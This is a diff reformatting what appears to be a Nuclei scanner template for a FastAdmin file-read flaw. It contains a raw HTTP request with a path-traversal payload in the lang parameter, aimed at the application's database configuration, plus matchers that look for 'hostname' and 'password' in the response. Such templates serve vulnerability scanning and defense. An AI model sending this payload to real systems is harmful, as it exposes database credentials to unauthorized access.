--- a/yaml/FastAdmin_lang_Fileread.yaml
+++ b/yaml/FastAdmin_lang_Fileread.yaml
@@ -11,24 +11,23 @@ info:
     verified: true
 
 http:
-- raw:
-  - |+
-    @timeout: 30s
-    GET /index/ajax/lang?lang=..//..//application/database HTTP/1.1
-    Host: {{Hostname}}
-    Accept-Language: zh-CN,zh;q=0.9
-    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
-    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
-    Accept-Encoding: gzip, deflate
+  - raw:
+      - |+
+        @timeout: 30s
+        GET /index/ajax/lang?lang=..//..//application/database HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: zh-CN,zh;q=0.9
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
+        Accept-Encoding: gzip, deflate
+        Connection: close
 
-
-  max-redirects: 3
-  matchers-condition: and
-  matchers:
-  - id: 1
-    type: word
-    part: body
-    words:
-    - hostname
-    - password
-    condition: and
+    max-redirects: 3
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - hostname
+          - password
+        condition: and
